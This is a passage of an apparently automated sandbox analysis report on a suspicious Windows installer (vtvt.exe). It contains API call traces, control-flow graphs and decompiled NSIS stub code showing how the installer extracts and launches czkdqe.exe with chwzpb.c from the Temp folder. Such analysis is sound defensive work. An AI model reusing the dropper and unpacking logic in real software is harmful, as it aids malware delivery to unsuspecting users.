                                                                                      • Part of subcall function 00406A35: GetModuleHandleA.KERNEL32(?,00000020,?,00403750,0000000B), ref: 00406A47
                                                                                      • Part of subcall function 00406A35: GetProcAddress.KERNEL32(00000000,?), ref: 00406A62
                                                                                    • lstrcatW.KERNEL32(1033,00423748), ref: 00403D98
                                                                                    • lstrlenW.KERNEL32("C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,?,?,?,"C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000,00000002,7476FAA0), ref: 00403E18
                                                                                    • lstrcmpiW.KERNEL32(?,.exe,"C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,?,?,?,"C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,00000000,C:\Users\user\AppData\Local\Temp,1033,00423748,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423748,00000000), ref: 00403E2B
                                                                                    • GetFileAttributesW.KERNEL32("C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,?,00000000,?), ref: 00403E36
                                                                                    • LoadImageW.USER32 ref: 00403E7F
                                                                                      • Part of subcall function 004065AF: wsprintfW.USER32 ref: 004065BC
                                                                                    • RegisterClassW.USER32 ref: 00403EBC
                                                                                    • SystemParametersInfoW.USER32 ref: 00403ED4
                                                                                    • CreateWindowExW.USER32 ref: 00403F09
                                                                                    • ShowWindow.USER32(00000005,00000000,?,00000000,?), ref: 00403F3F
                                                                                    • GetClassInfoW.USER32 ref: 00403F6B
                                                                                    • GetClassInfoW.USER32 ref: 00403F78
                                                                                    • RegisterClassW.USER32 ref: 00403F81
                                                                                    • DialogBoxParamW.USER32 ref: 00403FA0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                    • String ID: "C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$H7B$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                    • API String ID: 1975747703-1690669077
                                                                                    • Opcode ID: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                    • Instruction ID: e235badc60aeba35c86cf297cd954ec43a22164425911800af60bc979c7621a1
                                                                                    • Opcode Fuzzy Hash: 53155da091c4b3d7a5df89bad193350c55a8525543a5f9d2669ac1eab67f041a
                                                                                    • Instruction Fuzzy Hash: E661D570640201BAD730AF66AD45E2B3A7CEB84B49F40457FF945B22E1DB3D5911CA3D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 322 4030d0-40311e GetTickCount GetModuleFileNameW call 406158 325 403120-403125 322->325 326 40312a-403158 call 406668 call 405f83 call 406668 GetFileSize 322->326 327 40336a-40336e 325->327 334 403243-403251 call 40302e 326->334 335 40315e 326->335 341 403322-403327 334->341 342 403257-40325a 334->342 337 403163-40317a 335->337 339 40317c 337->339 340 40317e-403187 call 4035e2 337->340 339->340 348 40318d-403194 340->348 349 4032de-4032e6 call 40302e 340->349 341->327 344 403286-4032d2 GlobalAlloc call 406b90 call 406187 CreateFileW 342->344 345 40325c-403274 call 4035f8 call 4035e2 342->345 373 4032d4-4032d9 344->373 374 4032e8-403318 call 4035f8 call 403371 344->374 345->341 368 40327a-403280 345->368 353 403210-403214 348->353 354 403196-4031aa call 406113 348->354 349->341 358 403216-40321d call 40302e 353->358 359 40321e-403224 353->359 354->359 371 4031ac-4031b3 354->371 358->359 364 403233-40323b 359->364 365 403226-403230 call 406b22 359->365 364->337 372 403241 364->372 365->364 368->341 368->344 371->359 377 4031b5-4031bc 371->377 372->334 373->327 383 40331d-403320 374->383 377->359 379 4031be-4031c5 377->379 379->359 380 4031c7-4031ce 379->380 380->359 382 4031d0-4031f0 380->382 382->341 384 4031f6-4031fa 382->384 383->341 385 403329-40333a 383->385 386 403202-40320a 384->386 387 4031fc-403200 384->387 388 403342-403347 385->388 389 40333c 385->389 386->359 390 40320c-40320e 386->390 387->372 387->386 391 403348-40334e 388->391 389->388 390->359 391->391 392 403350-403368 call 406113 391->392 392->327
                                                                                    C-Code - Quality: 98%
                                                                                    			E004030D0(void* __eflags, signed int _a4) {
                                                                                    				DWORD* _v8;
                                                                                    				DWORD* _v12;
                                                                                    				intOrPtr _v16;
                                                                                    				long _v20;
                                                                                    				intOrPtr _v24;
                                                                                    				intOrPtr _v28;
                                                                                    				intOrPtr _v32;
                                                                                    				intOrPtr _v36;
                                                                                    				signed int _v40;
                                                                                    				short _v560;
                                                                                    				long _t54;
                                                                                    				void* _t57;
                                                                                    				void* _t62;
                                                                                    				intOrPtr _t65;
                                                                                    				void* _t68;
                                                                                    				intOrPtr* _t70;
                                                                                    				long _t82;
                                                                                    				signed int _t89;
                                                                                    				intOrPtr _t92;
                                                                                    				long _t94;
                                                                                    				void* _t102;
                                                                                    				void* _t106;
                                                                                    				long _t107;
                                                                                    				long _t110;
                                                                                    				void* _t111;
                                                                                    
                                                                                    				_t94 = 0;
                                                                                    				_v8 = 0;
                                                                                    				_v12 = 0;
                                                                                    				 *0x42a26c = GetTickCount() + 0x3e8;
                                                                                    				GetModuleFileNameW(0, L"C:\\Users\\jones\\AppData\\Roaming\\vtvt.exe", 0x400);
                                                                                    				_t106 = E00406158(L"C:\\Users\\jones\\AppData\\Roaming\\vtvt.exe", 0x80000000, 3);
                                                                                    				 *0x40a018 = _t106;
                                                                                    				if(_t106 == 0xffffffff) {
                                                                                    					return L"Error launching installer";
                                                                                    				}
                                                                                    				E00406668(0x436800, L"C:\\Users\\jones\\AppData\\Roaming\\vtvt.exe");
                                                                                    				E00406668(0x439000, E00405F83(0x436800));
                                                                                    				_t54 = GetFileSize(_t106, 0);
                                                                                    				 *0x420f00 = _t54;
                                                                                    				_t110 = _t54;
                                                                                    				if(_t54 <= 0) {
                                                                                    					L24:
                                                                                    					E0040302E(1);
                                                                                    					if( *0x42a274 == _t94) {
                                                                                    						goto L32;
                                                                                    					}
                                                                                    					if(_v12 == _t94) {
                                                                                    						L28:
                                                                                    						_t57 = GlobalAlloc(0x40, _v20); // executed
                                                                                    						_t111 = _t57;
                                                                                    						E00406B90(0x40ce68);
                                                                                    						E00406187(0x40ce68,  &_v560, L"C:\\Users\\jones\\AppData\\Local\\Temp\\"); // executed
                                                                                    						_t62 = CreateFileW( &_v560, 0xc0000000, _t94, _t94, 2, 0x4000100, _t94); // executed
                                                                                    						 *0x40a01c = _t62;
                                                                                    						if(_t62 != 0xffffffff) {
                                                                                    							_t65 = E004035F8( *0x42a274 + 0x1c);
                                                                                    							 *0x420f04 = _t65;
                                                                                    							 *0x420ef8 = _t65 - ( !_v40 & 0x00000004) + _v16 - 0x1c; // executed
                                                                                    							_t68 = E00403371(_v16, 0xffffffff, _t94, _t111, _v20); // executed
                                                                                    							if(_t68 == _v20) {
                                                                                    								 *0x42a270 = _t111;
                                                                                    								 *0x42a278 =  *_t111;
                                                                                    								if((_v40 & 0x00000001) != 0) {
                                                                                    									 *0x42a27c =  *0x42a27c + 1;
                                                                                    								}
                                                                                    								_t45 = _t111 + 0x44; // 0x44
                                                                                    								_t70 = _t45;
                                                                                    								_t102 = 8;
                                                                                    								do {
                                                                                    									_t70 = _t70 - 8;
                                                                                    									 *_t70 =  *_t70 + _t111;
                                                                                    									_t102 = _t102 - 1;
                                                                                    								} while (_t102 != 0);
                                                                                    								 *((intOrPtr*)(_t111 + 0x3c)) =  *0x420ef4;
                                                                                    								E00406113(0x42a280, _t111 + 4, 0x40);
                                                                                    								return 0;
                                                                                    							}
                                                                                    							goto L32;
                                                                                    						}
                                                                                    						return L"Error writing temporary file. Make sure your temp folder is valid.";
                                                                                    					}
                                                                                    					E004035F8( *0x420ef0);
                                                                                    					if(E004035E2( &_a4, 4) == 0 || _v8 != _a4) {
                                                                                    						goto L32;
                                                                                    					} else {
                                                                                    						goto L28;
                                                                                    					}
                                                                                    				} else {
                                                                                    					do {
                                                                                    						_t107 = _t110;
                                                                                    						asm("sbb eax, eax");
                                                                                    						_t82 = ( ~( *0x42a274) & 0x00007e00) + 0x200;
                                                                                    						if(_t110 >= _t82) {
                                                                                    							_t107 = _t82;
                                                                                    						}
                                                                                    						if(E004035E2(0x418ef0, _t107) == 0) {
                                                                                    							E0040302E(1);
                                                                                    							L32:
                                                                                    							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
                                                                                    						}
                                                                                    						if( *0x42a274 != 0) {
                                                                                    							if((_a4 & 0x00000002) == 0) {
                                                                                    								E0040302E(0);
                                                                                    							}
                                                                                    							goto L20;
                                                                                    						}
                                                                                    						E00406113( &_v40, 0x418ef0, 0x1c);
                                                                                    						_t89 = _v40;
                                                                                    						if((_t89 & 0xfffffff0) == 0 && _v36 == 0xdeadbeef && _v24 == 0x74736e49 && _v28 == 0x74666f73 && _v32 == 0x6c6c754e) {
                                                                                    							_a4 = _a4 | _t89;
                                                                                    							 *0x42a300 =  *0x42a300 | _a4 & 0x00000002;
                                                                                    							_t92 = _v16;
                                                                                    							 *0x42a274 =  *0x420ef0;
                                                                                    							if(_t92 > _t110) {
                                                                                    								goto L32;
                                                                                    							}
                                                                                    							if((_a4 & 0x00000008) != 0 || (_a4 & 0x00000004) == 0) {
                                                                                    								_v12 = _v12 + 1;
                                                                                    								_t110 = _t92 - 4;
                                                                                    								if(_t107 > _t110) {
                                                                                    									_t107 = _t110;
                                                                                    								}
                                                                                    								goto L20;
                                                                                    							} else {
                                                                                    								break;
                                                                                    							}
                                                                                    						}
                                                                                    						L20:
                                                                                    						if(_t110 <  *0x420f00) {
                                                                                    							_v8 = E00406B22(_v8, 0x418ef0, _t107);
                                                                                    						}
                                                                                    						 *0x420ef0 =  *0x420ef0 + _t107;
                                                                                    						_t110 = _t110 - _t107;
                                                                                    					} while (_t110 != 0);
                                                                                    					_t94 = 0;
                                                                                    					goto L24;
                                                                                    				}
                                                                                    			}




























                                                                                    0x004030db
                                                                                    0x004030de
                                                                                    0x004030e1
                                                                                    0x004030fb
                                                                                    0x00403100
                                                                                    0x00403113
                                                                                    0x00403118
                                                                                    0x0040311e
                                                                                    0x00000000
                                                                                    0x00403120
                                                                                    0x00403131
                                                                                    0x00403142
                                                                                    0x00403149
                                                                                    0x00403151
                                                                                    0x00403156
                                                                                    0x00403158
                                                                                    0x00403243
                                                                                    0x00403245
                                                                                    0x00403251
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040325a
                                                                                    0x00403286
                                                                                    0x0040328b
                                                                                    0x00403296
                                                                                    0x00403298
                                                                                    0x004032a9
                                                                                    0x004032c4
                                                                                    0x004032cd
                                                                                    0x004032d2
                                                                                    0x004032f1
                                                                                    0x00403301
                                                                                    0x00403313
                                                                                    0x00403318
                                                                                    0x00403320
                                                                                    0x0040332d
                                                                                    0x00403335
                                                                                    0x0040333a
                                                                                    0x0040333c
                                                                                    0x0040333c
                                                                                    0x00403344
                                                                                    0x00403344
                                                                                    0x00403347
                                                                                    0x00403348
                                                                                    0x00403348
                                                                                    0x0040334b
                                                                                    0x0040334d
                                                                                    0x0040334d
                                                                                    0x00403357
                                                                                    0x00403363
                                                                                    0x00000000
                                                                                    0x00403368
                                                                                    0x00000000
                                                                                    0x00403320
                                                                                    0x00000000
                                                                                    0x004032d4
                                                                                    0x00403262
                                                                                    0x00403274
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040315e
                                                                                    0x00403163
                                                                                    0x00403168
                                                                                    0x0040316c
                                                                                    0x00403173
                                                                                    0x0040317a
                                                                                    0x0040317c
                                                                                    0x0040317c
                                                                                    0x00403187
                                                                                    0x004032e0
                                                                                    0x00403322
                                                                                    0x00000000
                                                                                    0x00403322
                                                                                    0x00403194
                                                                                    0x00403214
                                                                                    0x00403218
                                                                                    0x0040321d
                                                                                    0x00000000
                                                                                    0x00403214
                                                                                    0x0040319d
                                                                                    0x004031a2
                                                                                    0x004031aa
                                                                                    0x004031d0
                                                                                    0x004031df
                                                                                    0x004031e5
                                                                                    0x004031ea
                                                                                    0x004031f0
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004031fa
                                                                                    0x00403202
                                                                                    0x00403205
                                                                                    0x0040320a
                                                                                    0x0040320c
                                                                                    0x0040320c
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004031fa
                                                                                    0x0040321e
                                                                                    0x00403224
                                                                                    0x00403230
                                                                                    0x00403230
                                                                                    0x00403233
                                                                                    0x00403239
                                                                                    0x00403239
                                                                                    0x00403241
                                                                                    0x00000000
                                                                                    0x00403241

                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 004030E4
                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Roaming\vtvt.exe,00000400), ref: 00403100
                                                                                      • Part of subcall function 00406158: GetFileAttributesW.KERNELBASE(00000003,00403113,C:\Users\user\AppData\Roaming\vtvt.exe,80000000,00000003), ref: 0040615C
                                                                                      • Part of subcall function 00406158: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 0040617E
                                                                                    • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,C:\Users\user\AppData\Roaming\vtvt.exe,C:\Users\user\AppData\Roaming\vtvt.exe,80000000,00000003), ref: 00403149
                                                                                    • GlobalAlloc.KERNELBASE(00000040,?), ref: 0040328B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000427000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000435000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000437000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337487256.000000000043B000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_vtvt.jbxd
                                                                                    Similarity
                                                                                    • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\vtvt.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                    • API String ID: 2803837635-3440521817
                                                                                    • Opcode ID: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                    • Instruction ID: 6a7077609e6cbe8902eef3654a796be60faa9129f620d49927b75729aeb44cd1
                                                                                    • Opcode Fuzzy Hash: 0724999653b3e73eed60d379075ff5ac069807c872a81a0186dc1bcbf61f2663
                                                                                    • Instruction Fuzzy Hash: 74710271A40204ABDB20DFB5DD85B9E3AACAB04315F21457FF901B72D2CB789E418B6D
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 459 40176f-401794 call 402da6 call 405fae 464 401796-40179c call 406668 459->464 465 40179e-4017b0 call 406668 call 405f37 lstrcatW 459->465 470 4017b5-4017b6 call 4068ef 464->470 465->470 474 4017bb-4017bf 470->474 475 4017c1-4017cb call 40699e 474->475 476 4017f2-4017f5 474->476 483 4017dd-4017ef 475->483 484 4017cd-4017db CompareFileTime 475->484 477 4017f7-4017f8 call 406133 476->477 478 4017fd-401819 call 406158 476->478 477->478 486 40181b-40181e 478->486 487 40188d-4018b6 call 4056ca call 403371 478->487 483->476 484->483 488 401820-40185e call 406668 * 2 call 4066a5 call 406668 call 405cc8 486->488 489 40186f-401879 call 4056ca 486->489 499 4018b8-4018bc 487->499 500 4018be-4018ca SetFileTime 487->500 488->474 521 401864-401865 488->521 501 401882-401888 489->501 499->500 503 4018d0-4018db FindCloseChangeNotification 499->503 500->503 504 402c33 501->504 506 4018e1-4018e4 503->506 507 402c2a-402c2d 503->507 508 402c35-402c39 504->508 511 4018e6-4018f7 call 4066a5 lstrcatW 506->511 512 4018f9-4018fc call 4066a5 506->512 507->504 518 401901-4023a2 call 405cc8 511->518 512->518 518->507 518->508 521->501 523 401867-401868 521->523 523->489
                                                                                    C-Code - Quality: 77%
                                                                                    			E0040176F(FILETIME* __ebx, void* __eflags) {
                                                                                    				void* __esi;
                                                                                    				void* _t35;
                                                                                    				void* _t43;
                                                                                    				void* _t45;
                                                                                    				FILETIME* _t51;
                                                                                    				FILETIME* _t64;
                                                                                    				void* _t66;
                                                                                    				signed int _t72;
                                                                                    				FILETIME* _t73;
                                                                                    				FILETIME* _t77;
                                                                                    				signed int _t79;
                                                                                    				WCHAR* _t81;
                                                                                    				void* _t83;
                                                                                    				void* _t84;
                                                                                    				void* _t86;
                                                                                    
                                                                                    				_t77 = __ebx;
                                                                                    				 *(_t86 - 8) = E00402DA6(0x31);
                                                                                    				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                                                                                    				_t35 = E00405FAE( *(_t86 - 8));
                                                                                    				_push( *(_t86 - 8));
                                                                                    				_t81 = L"\"C:\\";
                                                                                    				if(_t35 == 0) {
                                                                                    					lstrcatW(E00405F37(E00406668(_t81, 0x436000)), ??);
                                                                                    				} else {
                                                                                    					E00406668();
                                                                                    				}
                                                                                    				E004068EF(_t81);
                                                                                    				while(1) {
                                                                                    					__eflags =  *(_t86 + 8) - 3;
                                                                                    					if( *(_t86 + 8) >= 3) {
                                                                                    						_t66 = E0040699E(_t81);
                                                                                    						_t79 = 0;
                                                                                    						__eflags = _t66 - _t77;
                                                                                    						if(_t66 != _t77) {
                                                                                    							_t73 = _t66 + 0x14;
                                                                                    							__eflags = _t73;
                                                                                    							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                                                                                    						}
                                                                                    						asm("sbb eax, eax");
                                                                                    						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                                                                                    						__eflags = _t72;
                                                                                    						 *(_t86 + 8) = _t72;
                                                                                    					}
                                                                                    					__eflags =  *(_t86 + 8) - _t77;
                                                                                    					if( *(_t86 + 8) == _t77) {
                                                                                    						E00406133(_t81);
                                                                                    					}
                                                                                    					__eflags =  *(_t86 + 8) - 1;
                                                                                    					_t43 = E00406158(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                                                                                    					__eflags = _t43 - 0xffffffff;
                                                                                    					 *(_t86 - 0x38) = _t43;
                                                                                    					if(_t43 != 0xffffffff) {
                                                                                    						break;
                                                                                    					}
                                                                                    					__eflags =  *(_t86 + 8) - _t77;
                                                                                    					if( *(_t86 + 8) != _t77) {
                                                                                    						E004056CA(0xffffffe2,  *(_t86 - 8));
                                                                                    						__eflags =  *(_t86 + 8) - 2;
                                                                                    						if(__eflags == 0) {
                                                                                    							 *((intOrPtr*)(_t86 - 4)) = 1;
                                                                                    						}
                                                                                    						L31:
                                                                                    						 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t86 - 4));
                                                                                    						__eflags =  *0x42a2e8;
                                                                                    						goto L32;
                                                                                    					} else {
                                                                                    						E00406668(0x40b5f8, _t83);
                                                                                    						E00406668(_t83, _t81);
                                                                                    						E004066A5(_t77, _t81, _t83, "C:\Users\jones\AppData\Local\Temp",  *((intOrPtr*)(_t86 - 0x1c)));
                                                                                    						E00406668(_t83, 0x40b5f8);
                                                                                    						_t64 = E00405CC8("C:\Users\jones\AppData\Local\Temp",  *(_t86 - 0x30) >> 3) - 4;
                                                                                    						__eflags = _t64;
                                                                                    						if(_t64 == 0) {
                                                                                    							continue;
                                                                                    						} else {
                                                                                    							__eflags = _t64 == 1;
                                                                                    							if(_t64 == 1) {
                                                                                    								 *0x42a2e8 =  &( *0x42a2e8->dwLowDateTime);
                                                                                    								L32:
                                                                                    								_t51 = 0;
                                                                                    								__eflags = 0;
                                                                                    							} else {
                                                                                    								_push(_t81);
                                                                                    								_push(0xfffffffa);
                                                                                    								E004056CA();
                                                                                    								L29:
                                                                                    								_t51 = 0x7fffffff;
                                                                                    							}
                                                                                    						}
                                                                                    					}
                                                                                    					L33:
                                                                                    					return _t51;
                                                                                    				}
                                                                                    				E004056CA(0xffffffea,  *(_t86 - 8));
                                                                                    				 *0x42a314 =  *0x42a314 + 1;
                                                                                    				_t45 = E00403371(_t79,  *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                                                                                    				 *0x42a314 =  *0x42a314 - 1;
                                                                                    				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                                                                                    				_t84 = _t45;
                                                                                    				if( *(_t86 - 0x24) != 0xffffffff) {
                                                                                    					L22:
                                                                                    					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                                                                                    				} else {
                                                                                    					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                                                                                    					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                                                                                    						goto L22;
                                                                                    					}
                                                                                    				}
                                                                                    				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                                                                                    				__eflags = _t84 - _t77;
                                                                                    				if(_t84 >= _t77) {
                                                                                    					goto L31;
                                                                                    				} else {
                                                                                    					__eflags = _t84 - 0xfffffffe;
                                                                                    					if(_t84 != 0xfffffffe) {
                                                                                    						E004066A5(_t77, _t81, _t84, _t81, 0xffffffee);
                                                                                    					} else {
                                                                                    						E004066A5(_t77, _t81, _t84, _t81, 0xffffffe9);
                                                                                    						lstrcatW(_t81,  *(_t86 - 8));
                                                                                    					}
                                                                                    					_push(0x200010);
                                                                                    					_push(_t81);
                                                                                    					E00405CC8();
                                                                                    					goto L29;
                                                                                    				}
                                                                                    				goto L33;
                                                                                    			}


















                                                                                    0x0040176f
                                                                                    0x00401776
                                                                                    0x00401782
                                                                                    0x00401785
                                                                                    0x0040178a
                                                                                    0x0040178d
                                                                                    0x00401794
                                                                                    0x004017b0
                                                                                    0x00401796
                                                                                    0x00401797
                                                                                    0x00401797
                                                                                    0x004017b6
                                                                                    0x004017bb
                                                                                    0x004017bb
                                                                                    0x004017bf
                                                                                    0x004017c2
                                                                                    0x004017c7
                                                                                    0x004017c9
                                                                                    0x004017cb
                                                                                    0x004017d0
                                                                                    0x004017d0
                                                                                    0x004017db
                                                                                    0x004017db
                                                                                    0x004017ec
                                                                                    0x004017ee
                                                                                    0x004017ee
                                                                                    0x004017ef
                                                                                    0x004017ef
                                                                                    0x004017f2
                                                                                    0x004017f5
                                                                                    0x004017f8
                                                                                    0x004017f8
                                                                                    0x004017ff
                                                                                    0x0040180e
                                                                                    0x00401813
                                                                                    0x00401816
                                                                                    0x00401819
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040181b
                                                                                    0x0040181e
                                                                                    0x00401874
                                                                                    0x00401879
                                                                                    0x004015b6
                                                                                    0x0040292e
                                                                                    0x0040292e
                                                                                    0x00402c2a
                                                                                    0x00402c2d
                                                                                    0x00402c2d
                                                                                    0x00000000
                                                                                    0x00401820
                                                                                    0x00401826
                                                                                    0x0040182d
                                                                                    0x0040183a
                                                                                    0x00401845
                                                                                    0x0040185b
                                                                                    0x0040185b
                                                                                    0x0040185e
                                                                                    0x00000000
                                                                                    0x00401864
                                                                                    0x00401864
                                                                                    0x00401865
                                                                                    0x00401882
                                                                                    0x00402c33
                                                                                    0x00402c33
                                                                                    0x00402c33
                                                                                    0x00401867
                                                                                    0x00401867
                                                                                    0x00401868
                                                                                    0x00401493
                                                                                    0x0040239d
                                                                                    0x0040239d
                                                                                    0x0040239d
                                                                                    0x00401865
                                                                                    0x0040185e
                                                                                    0x00402c35
                                                                                    0x00402c39
                                                                                    0x00402c39
                                                                                    0x00401892
                                                                                    0x00401897
                                                                                    0x004018a5
                                                                                    0x004018aa
                                                                                    0x004018b0
                                                                                    0x004018b4
                                                                                    0x004018b6
                                                                                    0x004018be
                                                                                    0x004018ca
                                                                                    0x004018b8
                                                                                    0x004018b8
                                                                                    0x004018bc
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x004018bc
                                                                                    0x004018d3
                                                                                    0x004018d9
                                                                                    0x004018db
                                                                                    0x00000000
                                                                                    0x004018e1
                                                                                    0x004018e1
                                                                                    0x004018e4
                                                                                    0x004018fc
                                                                                    0x004018e6
                                                                                    0x004018e9
                                                                                    0x004018f2
                                                                                    0x004018f2
                                                                                    0x00401901
                                                                                    0x00401906
                                                                                    0x00402398
                                                                                    0x00000000
                                                                                    0x00402398
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                                                                                    • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,"C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,00000000,00000000,"C:\Users\user\AppData\Local\Temp\czkdqe.exe" C:\Users\user\AppData\Local\Temp\chwzpb.c,00436000,?,?,00000031), ref: 004017D5
                                                                                      • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                      • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,00422728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                      • Part of subcall function 004056CA: lstrcatW.KERNEL32(00422728,004030A8), ref: 00405725
                                                                                      • Part of subcall function 004056CA: SetWindowTextW.USER32(00422728,00422728), ref: 00405737
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                      • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.337422665.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.337413138.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337431193.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.000000000040D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.337439008.0000000000425000.00000004.00000001.01000000.00000006.sdmpDownload File
